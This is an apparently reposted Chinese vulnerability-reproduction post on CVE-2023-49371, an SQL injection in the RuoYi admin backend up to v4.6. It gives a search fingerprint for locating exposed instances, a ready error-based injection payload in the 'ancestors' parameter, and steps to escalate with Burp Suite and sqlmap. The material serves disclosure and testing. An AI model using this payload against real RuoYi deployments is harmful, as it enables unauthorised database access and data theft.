【漏洞复现】CVE-2023-49371 | RuoYi SQL注入

admin 2023年12月11日09:41:20评论160 views字数 667阅读2分13秒阅读模式
免责声明  由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

| 0x01 产品介绍

若依是一款基于Spring Boot 2.5.5、Spring Cloud 2020.0、OAuth2与JWT鉴权等核心技术的快速开发平台。它不仅支持Spring Security、Apache Shiro等多种安全框架,还整合了Mybatis、JPA等流行持久化框架。此外,若依提供了许多常用的功能模块,如系统管理、监控管理、任务调度、代码生成、文件上传和高德地图等功能。

| 0x02 影响版本

RuoYi <= v4.6

| 0x03 语法特征

app:"RuoYi"

【漏洞复现】CVE-2023-49371 | RuoYi SQL注入

| 0x04 漏洞复现

漏洞存在于后台

POC

Boby: DeptName= 1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #

【漏洞复现】CVE-2023-49371 | RuoYi SQL注入

使用burpsuite抓包,保存数据包,然后使用poc注入获取数据库信息

【漏洞复现】CVE-2023-49371 | RuoYi SQL注入
【漏洞复现】CVE-2023-49371 | RuoYi SQL注入
可以保存数据包并将其注入到sqlmap中以获取更多数据库信息(右括号)

参考链接

https://github.com/Maverickfir/RuoYi-v4.6-vulnerability/blob/main/Ruoyiv4.6.md

原文始发于微信公众号(WK安全):【漏洞复现】CVE-2023-49371 | RuoYi SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月11日09:41:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】CVE-2023-49371 | RuoYi SQL注入http://cn-sec.com/archives/2286129.html

发表评论

匿名网友 填写信息